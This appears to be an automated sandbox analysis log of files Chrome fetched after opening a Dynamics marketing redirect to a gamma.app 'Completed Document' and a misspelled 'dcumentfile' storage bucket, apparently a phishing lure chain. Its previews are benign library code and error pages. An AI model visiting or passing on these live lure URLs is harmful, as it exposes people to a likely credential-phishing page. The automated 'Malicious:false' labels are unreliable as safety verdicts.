                                                                                                                                                                • VT rate limit hit for: https://public-usa.mkt.dynamics.com/api/orgs/f8d62d3a-5b03-f011-b015-6045bd003905/r/FMPIXkRqqkmv-j_Li7QBAAEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fgamma.app%252Fdocs%252FJanel-Group-Completed-Document-x686r1ir4nghubz%253Fmode%253Dpresent%2523card-an1daph37h4un5p%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&amp;digest=O1MpDB0efooTe4PN%2BrbvabY6GTxgYZEijI2csju%2FBYg%3D&amp;secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (55272)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):55326
                                                                                                                                                                Entropy (8bit):5.144646192025578
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:2B6EE10C6760BE5B7E17704CA2F03A49
                                                                                                                                                                SHA1:B4B69EF3FA17ECEDAF2F1704BCBBEA54FA311A45
                                                                                                                                                                SHA-256:1F1A73CD8FC5ACEA3C70B3296DCF725CDF6B9FBCA1663401AE2EAA6FCAD93730
                                                                                                                                                                SHA-512:164DCC91FC0EF5F7B684BE524D26F1DF39C6463D59B7AF18863215EF69CBA3A972019DC1F9131AF97F6C3CCCECB2CF3BE971213C89230BB7976463D6E1303C72
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/9b583bcd-e94a9f27afcc219c.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6407],{39448:(e,r,t)=>{t.d(r,{Rv:()=>r4,ZY:()=>rM});var o,n,i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?Symbol:function(e){return"Symbol("+e+")"};function a(){}var l="undefined"!=typeof self?self:"undefined"!=typeof window?window:"undefined"!=typeof global?global:void 0;function u(e){return"object"==typeof e&&null!==e||"function"==typeof e}var s=Promise,c=Promise.prototype.then,d=Promise.resolve.bind(s),f=Promise.reject.bind(s);function b(e){return new s(e)}function p(e,r,t){return c.call(e,r,t)}function _(e,r,t){p(p(e,r,t),void 0,a)}function h(e,r){_(e,void 0,r)}function y(e){p(e,void 0,a)}var v=function(){var e=l&&l.queueMicrotask;if("function"==typeof e)return e;var r=d(void 0);return function(e){return p(r,e)}}();function m(e,r,t){if("function"!=typeof e)throw TypeError("Argument is not a function");return Function.prototype.apply.call(e,r,t)}function g(e,r,t){try{var o;return o=m(e,r,t),d(o)}ca
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):228
                                                                                                                                                                Entropy (8bit):5.187412949903253
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:C38659F6667E4CAEB3C8E42584628F39
                                                                                                                                                                SHA1:5145E1116D696C1A5C26AAC304DFEA1A9805EEBC
                                                                                                                                                                SHA-256:73CD9CC5E09AFF5B7B07FA86F903393FFEB4523DACABC8B263B3DD8CC4A0C9F7
                                                                                                                                                                SHA-512:633A690027C5A995DF1B24DC0DDD127751512A49103BF7DC35841C04B1785B7BE6A049D6F1CE1FD0EC5B52C7AEC2EF9FF203D1F524B9F32ED137C218E6649CC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://dcumentfile.us-southeast-1.linodeobjects.com/favicon.ico
                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8"?><Error><Code>NoSuchKey</Code><BucketName>dcumentfile</BucketName><RequestId>tx000008f64df3f116823d6-0067d962c3-132680d11-default</RequestId><HostId>132680d11-default-default</HostId></Error>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):1303764
                                                                                                                                                                Entropy (8bit):5.094863182477238
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:D08B237BF69DE1466C7D9ACE07C26240
                                                                                                                                                                SHA1:DEBFDEFEDC801E90DB95AB79269A920D33041B06
                                                                                                                                                                SHA-256:D1DD8E99FB561A236FB3A56AAB1AB2EF66176F9E46998B2E57AABED6265F204F
                                                                                                                                                                SHA-512:03706E0E4234F09D647021292712D8FE1345CD5599F3B90C816BA7BA9A46BF2F3D82A4C6CD363F2B6765EC6C37B3C8A4D8D8F1CFEAE8A05C317F8A932001C910
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/5966-1eaa7198d39fb727.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5966],{59945:(e,l,t)=>{"use strict";t.r(l),t.d(l,{default:()=>a});let a={src:"/_next/static/media/atmosphere-background.a041341a.png",height:1513,width:2666,blurDataURL:"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAFCAMAAABPT11nAAAAM1BMVEX48ur5wZL33cr4y7X6r8X11OT1177z07D35Nj37OP6xrP3ycT4xJv8rafz6uz2zs78pLCxNmi0AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAK0lEQVR4nAXBhwEAIAzAoFg73f9fKwA5Ve0A1fdTI8XHmNeI1VrPKjwiBPgWUADzktU9bAAAAABJRU5ErkJggg==",blurWidth:8,blurHeight:5}},14561:(e,l,t)=>{"use strict";t.r(l),t.d(l,{default:()=>a});let a={src:"/_next/static/media/canaveral.a27ae3b5.png",height:2250,width:3e3,blurDataURL:"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAgAAAAGCAMAAADJ2y/JAAAAD1BMVEUEBAUECxQFEyUHLUcKJzuueyPtAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAJElEQVR4nDWIQQoAMAyDoun/3zwonRfFgNNpc94Y1ABZ9OKfBwq7AEqGsqUMAAAAAElFTkSuQmCC",blurWidth:8,blurHeight:6}},58525:(e,l,t)=>{"use strict";t.r(l),t.d(l,{default:()=>a});let a={src:"/_next/static/
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):126624
                                                                                                                                                                Entropy (8bit):4.570104889118346
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:D0A35E72CB9816C94E998A5F15FC7487
                                                                                                                                                                SHA1:7B4EBE4369CCB22523ADC8CB3CA1EA990E6C7027
                                                                                                                                                                SHA-256:47DCC1041F7C1706E908F9073DDF6EF2AF540B802D772F419395CE7D44691ACF
                                                                                                                                                                SHA-512:D1F791BFA32E5572351BE15AE4324BC1410E17B95751D55450A6E7D1736E9D8FDD0A8E55D231DB0DA96786752A93EA19D2A36D5DE0A01179431ED19CFC528241
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/ad54e6ef-c1497d83c32edce5.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[23],{3040:(c,s,a)=>{a.d(s,{$7g:()=>an,$8E:()=>V,$Fj:()=>cL,$MS:()=>cw,$UM:()=>s7,A54:()=>cx,AEl:()=>aJ,AJu:()=>s_,APi:()=>sK,AgW:()=>ae,ArK:()=>ak,B0C:()=>s2,BEE:()=>f,BH7:()=>sk,Bep:()=>so,Bi7:()=>am,Bwz:()=>X,BzA:()=>ck,CKr:()=>I,CN3:()=>ai,CYF:()=>ag,CeG:()=>sm,Cpz:()=>aX,Cyq:()=>ch,DDU:()=>cA,DJx:()=>cj,DN2:()=>sh,DO5:()=>ca,DW4:()=>_,DX_:()=>se,Dfk:()=>W,EZy:()=>sb,FXY:()=>ad,G1Y:()=>cy,GEE:()=>c8,GHC:()=>u,GQu:()=>a$,GR4:()=>aS,Ge5:()=>s1,GxD:()=>H,H37:()=>aM,Hmx:()=>c6,IJd:()=>cW,IMq:()=>aw,INu:()=>as,IPD:()=>sv,Iae:()=>c9,Int:()=>at,J71:()=>aT,JAe:()=>aI,JN2:()=>sF,Jq7:()=>sD,Jt$:()=>ac,Ju_:()=>c$,KKr:()=>sV,KMJ:()=>aV,KTq:()=>cr,LBj:()=>a_,LkM:()=>sC,MNJ:()=>Q,MjD:()=>s9,Mkm:()=>sW,O0T:()=>aO,O26:()=>cH,OM7:()=>cU,OtC:()=>ap,OxR:()=>g,PIP:()=>S,Pie:()=>s6,Q3O:()=>sy,QEm:()=>cm,QJT:()=>aU,QLR:()=>af,QOt:()=>j,QRE:()=>cu,Qpm:()=>ar,Qyz:()=>aF,Rbk:()=>A,ReK:()=>aG,S$_:()=>cN,S3S:()=>ay,SGM:()=>cg,T4C:()=>sZ,U23
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (7629)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):7679
                                                                                                                                                                Entropy (8bit):5.236643726452405
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:2567B4D9ED89A313A50FFBE0798940A0
                                                                                                                                                                SHA1:0C37E61AE3BBE782C68AD52F76D421DB80810903
                                                                                                                                                                SHA-256:E49C84F8D155C0CAD980A856BCB59437238F80691B4F73F25F8382D72B00F558
                                                                                                                                                                SHA-512:80153AD79F8894DD3F5EC731060A71C0D6676AEED4B00EF7AC9D8B25801E70A2DB973BBDD146F0BDFA31D2471D84FF30D313D8D67E442680F00720CC33C72FE2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/4483.b1e22900348e682f.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4483],{74658:t=>{t.exports={prettyPrint:function(t,i){var e,n,s,h,r,a;for(n=(i=i||{}).indent_size||4,s=i.indent_char||" ",r=i.brace_style||"collapse",h=0==i.max_char?1/0:i.max_char||70,a=i.unformatted||["a","span","bdo","em","strong","dfn","code","samp","kbd","var","cite","abbr","acronym","q","sub","sup","tt","i","b","big","small","u","s","strike","font","ins","del","pre","address","dt","h1","h2","h3","h4","h5","h6"],(e=new function(){return this.pos=0,this.token="",this.current_mode="CONTENT",this.tags={parent:"parent1",parentcount:1,parent1:""},this.tag_type="",this.token_text=this.last_token=this.last_text=this.token_type="",this.Utils={whitespace:"\n\r. ".split(""),single_token:"br,input,link,meta,!doctype,basefont,base,area,hr,wbr,param,img,isindex,?xml,embed,?php,?,?=".split(","),extra_liners:"head,body,/html".split(","),in_array:function(t,i){for(var e=0;e<i.length;e++)if(t===i[e])return!0;return!1}},this.get_content=funct
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18
                                                                                                                                                                Entropy (8bit):3.836591668108979
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:129ABF301E12DA2879ECA02A1BE6065A
                                                                                                                                                                SHA1:EC9109C291BC83CF628BB091FFA8617CDDBB43E9
                                                                                                                                                                SHA-256:6AEDD7F59ED412B7F9F89CBFFFA28DF97744A820B1B75A339E3A4F9F2AA1F9A9
                                                                                                                                                                SHA-512:0E3AF1215284F47285A4AF248FC7ED85AA0FC461222E7504DB16F610BC81ED3685AFE443325A5DED2BF1CC0E3A1C804693B24116CEECB6D35E61AF65F0A5972F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:GET query missing.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 6742
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):2674
                                                                                                                                                                Entropy (8bit):7.9233943567349945
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1E7745478842C3B2C9A7D41076CD097D
                                                                                                                                                                SHA1:A05BAE801907AAD0144575AC814B5264807D5541
                                                                                                                                                                SHA-256:090F857460A484627A8A7E8F9280784B4D7C6DE4819AE65547EC4898F97EE8C6
                                                                                                                                                                SHA-512:F668BB053BE96D8016882584A667D5EA17875FDEE5AA1208488BE7CE409D90B6C0DA340E95D3FB468148DE16F402519F23C7A14D8CC48DB8F3FCE03AFAED8822
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://widget.intercom.io/widget/ihnzqaok
                                                                                                                                                                Preview:...........Y.r.6.....#.c...HZ9L.q.g.&.e..q....$$$...eU.....).n:...&/....q..&s.*&.....h.z.....Tt.O.S!U..21.!.%$..3.E.wrR.$.#)..IF..T...]P:.$>..P.A..1M....aN.......kV1....k{.R..R)..;.%s'.1.uv.S..:$.X,*k.Iu(...:...G...$.=.3E.x...../....*.Q.\...yD_.........xv~.":?.F.I...f...q.....4tg....k.l..].e.g.......2..]W.f...+..(.D..QB...T.`o...KO.k`#...h.7......LD.;2.Q..;y..&.`..k..p%Us.-Q...d.3X...j..(.).......e...=..).Be_.5.e.Lp.f)..CDk.#.g....T..Z.T.+a...M....;{.L1..........Qi{u...H.P,..Z..W....*..*..MXH..2.~.X.k...BD[.....Hh.p....f.*..w..."..1..mG.8..E..L*.)..]O..Ax..8\..s7.,.iWJ..M...s\.....^..$.....S....... .......L..n......H.....}G.[KP.*7G..(miU.l}..............y.|.Qa..V.K.v8T..d.?+.Zl..A....%%..8n=(H._Q.X......|...Q.......zW..*. %........^..zH.&.$..Zm.~z.^...fS...z..f@}c.}...7..0X.H..L....AmS......?..|...uvT..n...fW.b.(F.L.q......&...C....'M!...h.Fv.....Hg..B.'...R..S..f.DIDe.]#5^.Lm.B&."...y...3yJD".'...".......f.-e.9.jQ?$.cL...)L
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (57897)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):57951
                                                                                                                                                                Entropy (8bit):4.623003163187446
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1DAC4EFD6650A2CD6D83FD3D7E72251A
                                                                                                                                                                SHA1:1178F6295D0649D2B226859EA642997EF594ECEE
                                                                                                                                                                SHA-256:77E9985DC63D512FFDE98E82B2A17936AC3F836BA16CB7F3E699E312DC1D3913
                                                                                                                                                                SHA-512:5989BA8F3ED7E7BD3245E634F426DC17C22BB8934A71BF1BEF03F3AB4654635B171F83BFE7FCBC0973A8E9076EEAAE9381F9ABDC97AE353A913AE82B26D63A8E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/b4d7d80c-b21e42481057053e.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3861],{12917:(c,s,i)=>{i.d(s,{$UM:()=>cw,A8r:()=>cc,AgW:()=>cA,B4x:()=>H,BH7:()=>co,Cyq:()=>_,Dkf:()=>V,Dn6:()=>S,HuL:()=>R,IP$:()=>cN,JAe:()=>cQ,K1h:()=>cD,Kuo:()=>M,MVg:()=>u,MjD:()=>ck,Mkm:()=>cx,O_q:()=>cH,OxR:()=>d,PW6:()=>cE,QRE:()=>K,QaE:()=>t,Qte:()=>c$,Qyz:()=>cB,R9H:()=>cp,RDv:()=>l,S7o:()=>o,Tip:()=>b,Tsj:()=>F,U23:()=>cV,UiS:()=>c_,Uj9:()=>j,ViY:()=>cy,W1p:()=>O,XYS:()=>ch,Y$q:()=>D,YLF:()=>cY,YOd:()=>ca,_ur:()=>cd,a8v:()=>cP,aXh:()=>cL,adM:()=>cX,bFI:()=>C,bKR:()=>W,c9S:()=>cW,cCs:()=>e,cWs:()=>P,cse:()=>Q,cvw:()=>cO,e68:()=>cG,ecg:()=>cl,f1L:()=>m,ffg:()=>cq,fyG:()=>U,gD3:()=>cg,gK3:()=>Z,hP6:()=>cj,iHb:()=>cf,ijD:()=>cu,im:()=>ct,j7A:()=>Y,jTw:()=>I,jb9:()=>B,jbh:()=>cI,jwR:()=>$,kWV:()=>cr,l8N:()=>r,lEd:()=>p,n2$:()=>cF,n2W:()=>cJ,nKW:()=>v,o97:()=>cb,oDg:()=>N,oZz:()=>cT,okg:()=>cU,p7g:()=>x,pch:()=>cS,ppD:()=>h,pvD:()=>g,q9c:()=>cK,qIE:()=>T,qTS:()=>A,qtl:()=>E,r5G:()=>cz,rC2:()=>L,s67:()=>w,seF:()=
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):548
                                                                                                                                                                Entropy (8bit):4.660801881684815
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:4B074B0B59693FA9F94FB71B175FB187
                                                                                                                                                                SHA1:0004D4F82B546013424B2E0DE084395071EEF98B
                                                                                                                                                                SHA-256:25FB23868EBF48348F9E438E00CB9B9D9B3A054F32482A781C762CC4F9CC6393
                                                                                                                                                                SHA-512:F928E9FAA0BC776FC5D8A0326981853709D437B7B1C2E238894BFB2ACBB627442C425CBB00D369C52D15876B6C795E67F7580341686696D569A908A6ADD4B444
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:<html>..<head><title>403 Forbidden</title></head>..<body>..<center><h1>403 Forbidden</h1></center>..<hr><center>nginx</center>..</body>..</html>.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->.. a padding to disable MSIE and Chrome friendly error page -->..
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (40880)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):40930
                                                                                                                                                                Entropy (8bit):5.49405446736951
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:0FE99416521DDB610ED6A435783BFD0C
                                                                                                                                                                SHA1:DBD7168C5897392A3B2DA5A60061101EA4F890CD
                                                                                                                                                                SHA-256:A163DCA1E3D1FE582CBB17048FB14EE84DB916F15FEFB61AB254D348491FD001
                                                                                                                                                                SHA-512:812C74CE19FA13FD7451199928122D0525BCA6BC75755085815F0B94D703B422EB712CF883CF7297D753C6CC51158D97BEE3AC0F16061C806C02B7338DA53C4B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/1368-a34fc175a13a2b77.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1368],{97548:(e,t,n)=>{n.d(t,{e:()=>en});var i=n(31085),a=n(25420),r=n(14041),l=n(64225),s=n(16092),o=n(57673),d=n(23051),c=n(44507),u=n(92667),m=n(80532),h=n(2600),x=n(80853),g=n(15428),p=n(3040),v=n(24221),f=n(95640),j=n(60674),b=n(50933),w=n.n(b),y=n(46108),I=n.n(y),R=n(20869),C=n(27793),k=n(10458),S=n(77654),_=n(6402),E=n(24383),z=n(80900),G=n(40408),T=n(34118),M=n(78354),A=n(17539),V=n(60434),D=n(75675),L=n(69920);let P=(0,j.P)(m.az),F=e=>{let{card:t,theme:n,...a}=e,l=(0,r.useMemo)(()=>{if(t)return(0,z.Ol)({docFlags:{cardLayoutsEnabled:!0}},[t])},[t]);return(0,i.jsx)(P,{pointerEvents:"none",sx:{"*":{backdropFilter:"none !important",transitionProperty:"background-color, color, border-color, padding, margin, width, maxWidth, fontSize",transitionDuration:".15s",[".button .".concat(S.U6)]:{transitionProperty:"none"}},".doc-content-wrapper *[data-doc-background-element], .motion-present-mode-bg":{display:"none"},".ca
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (32877)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):971112
                                                                                                                                                                Entropy (8bit):5.432706396376364
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:B8AA6F8036F6AA2B85DD1CD4AC0A9EEC
                                                                                                                                                                SHA1:6823929E9EDD089209E62CBD06F450E34D85613C
                                                                                                                                                                SHA-256:227AEDA8F8BA5212E056C860C6B678D695F0078B0539BF27F39FD3BC742280EF
                                                                                                                                                                SHA-512:2733530E78D35721F8379E96AC52F4B0904E8FB77928F1D5B97F98297CA35CEC390F4934E209DC5C42EC7E480C1A0BFBB223E9243AC1ECB69B60407BFFF8FAB6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://assets.churnkey.co/js/app.js?appId=7blc4aqmp
                                                                                                                                                                Preview:(function(e){var t={};function n(r){if(t[r])return t[r].exports;var i=t[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}n.m=e,n.c=t,n.d=function(e,t,r){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:r})},n.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)n.d(r,i,function(t){return e[t]}.bind(null,i));return r},n.n=function(e){var t=e&&e.__esModule?function(){return e["default"]}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="/",n(n.s=0)})({0:function(e,t,n){e.exports=n("56d7")},"00ee":function(e,t,n){var r=n("b622"),i=r
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (8149)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):8199
                                                                                                                                                                Entropy (8bit):5.3918275338210595
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:213EA59EE4EB1EE882CC053FF7057826
                                                                                                                                                                SHA1:FCA3417B0571B14AF949E0AAE0FE1071F0FD7106
                                                                                                                                                                SHA-256:0AAD63B38F6DA8D1FEEF3BF48D8B2DAB0C0249FAE95F4768A4B626325EDD9CAF
                                                                                                                                                                SHA-512:900D2A30C8F141F0611FFC655982E128E6529F86E30DADC87DF6C0E3AD7DC2E222EB485B83DEC7A40E1E784C178CC77CC235C468F71262B9D9AC5AC1778EDD0E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://gamma.app/_next/static/chunks/6980-3b5a299f0e1e01a2.js?dpl=dpl_A8kBsHNrvDCGRieqMpGJQjqcRB45
                                                                                                                                                                Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6980],{16003:(e,a,t)=>{t.d(a,{w:()=>d});var l=t(63552),r=t(11403),n=t(31171),s=t(11976),o=t(31085),c={path:(0,o.jsxs)("g",{stroke:"currentColor",strokeWidth:"1.5",children:[(0,o.jsx)("path",{strokeLinecap:"round",fill:"none",d:"M9,9a3,3,0,1,1,4,2.829,1.5,1.5,0,0,0-1,1.415V14.25"}),(0,o.jsx)("path",{fill:"currentColor",strokeLinecap:"round",d:"M12,17.25a.375.375,0,1,0,.375.375A.375.375,0,0,0,12,17.25h0"}),(0,o.jsx)("circle",{fill:"none",strokeMiterlimit:"10",cx:"12",cy:"12",r:"11.25"})]}),viewBox:"0 0 24 24"},i=(0,l.R)((e,a)=>{let{as:t,viewBox:l,color:i="currentColor",focusable:u=!1,children:d,className:b,__css:h,...m}=e,p=(0,s.cx)("chakra-icon",b),v=(0,r.Vl)("Icon",e),x={ref:a,focusable:u,className:p,__css:{w:"1em",h:"1em",display:"inline-block",lineHeight:"1em",flexShrink:0,color:i,...h,...v}},f=null!=l?l:c.viewBox;if(t&&"string"!=typeof t)return(0,o.jsx)(n.B.svg,{as:t,...x,...m});let _=null!=d?d:c.path;return(0,o.j
                                                                                                                                                                No static file info